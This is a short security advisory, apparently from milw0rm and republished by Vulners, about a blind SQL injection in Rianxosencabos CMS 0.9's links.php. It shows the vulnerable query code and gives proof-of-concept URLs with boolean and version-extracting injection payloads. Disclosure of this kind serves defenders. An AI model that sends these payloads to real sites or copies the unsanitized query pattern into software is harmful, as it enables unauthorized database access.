Rianxosencabos CMS 0.9 - Remote Blind SQL Injection Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Rianxosencabos CMS 0.9 Remote Blind SQL Injection Vulnerability in links.ph


                                                -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rianxosencabos CMS 0.9 Remote Blind SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

/ Script: Rianxosencabos
/ Version: 0.9
/ File affected: scripts/links.php
/ Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz


ka0x &#60;ka0x01 [at] gmail [dot] com&#62;
D.O.M Labs - Security Researchers
- www.domlabs.org

Vuln code:

-----
88:  function visita($id) {
93:  $resultado=$bd-&#62;consulta(&#34;SELECT direccion, clicks FROM links WHERE id=$id LIMIT 1&#34;);
....

112: if ($_GET[&#39;id&#39;]) {
113: links::visita($_GET[&#39;id&#39;])
-----


Proof of Concept:

http://[host]/[cms]/?s=links&id=1 and 1=1 -&#62; True
http://[host]/[cms]/?s=links&id=1 and 1=0 -&#62; False
http://[host]/[cms]/?s=links&id=1 and ascii(substring(@@version,1,1)=52


__END__

# milw0rm.com [2008-09-30]

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1